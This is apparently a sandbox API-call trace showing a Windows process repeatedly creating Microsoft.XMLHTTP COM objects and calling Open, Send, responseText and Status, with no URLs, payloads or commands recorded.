	[0914.184] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0914.184] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0914.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0914.184] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0914.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.184] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0914.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.187] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0914.187] SysStringLen (param_1=0x0) returned 0x0
	[0914.187] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0914.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0914.187] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0914.187] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0914.187] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0914.187] ??2@YAPEAX_K@Z () returned 0x62f330
	[0914.188] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0914.188] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0914.188] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0914.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0914.188] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0914.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.188] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0914.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.188] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0914.188] SysStringLen (param_1=0x0) returned 0x0
	[0914.188] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0914.188] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0914.189] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0914.189] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0914.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0914.189] ??2@YAPEAX_K@Z () returned 0x62f310
	[0914.189] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f310) 
	[0914.189] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0914.189] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0914.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0914.189] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0914.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.189] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0914.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.189] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0914.189] SysStringLen (param_1=0x0) returned 0x0
	[0914.189] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0914.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0914.190] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0914.190] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0914.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0914.190] ??2@YAPEAX_K@Z () returned 0x62f330
	[0914.190] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0914.190] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0914.190] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0914.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0914.190] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0914.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.190] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0914.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.191] longjmp () 
	[0914.191] longjmp () 
	[0914.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0914.191] SysStringLen (param_1=0x0) returned 0x0
	[0914.191] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0914.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0914.191] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0914.191] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0914.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0914.191] ??2@YAPEAX_K@Z () returned 0x62f310
	[0914.192] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0914.192] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0914.192] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0914.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0914.192] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0914.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0914.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.192] longjmp () 
	[0914.193] longjmp () 
	[0914.193] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0914.193] SysStringLen (param_1=0x0) returned 0x0
	[0914.193] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0914.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0914.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72c0) returned 0x0
	[0914.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0914.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0914.193] ??2@YAPEAX_K@Z () returned 0x62f330
	[0914.193] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f330) 
	[0914.193] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0914.193] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0914.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72c0) returned 0x0
	[0914.194] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72c0) returned 0x3
	[0914.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0914.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0914.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0914.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0914.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0914.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0914.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0914.729] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0914.729] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
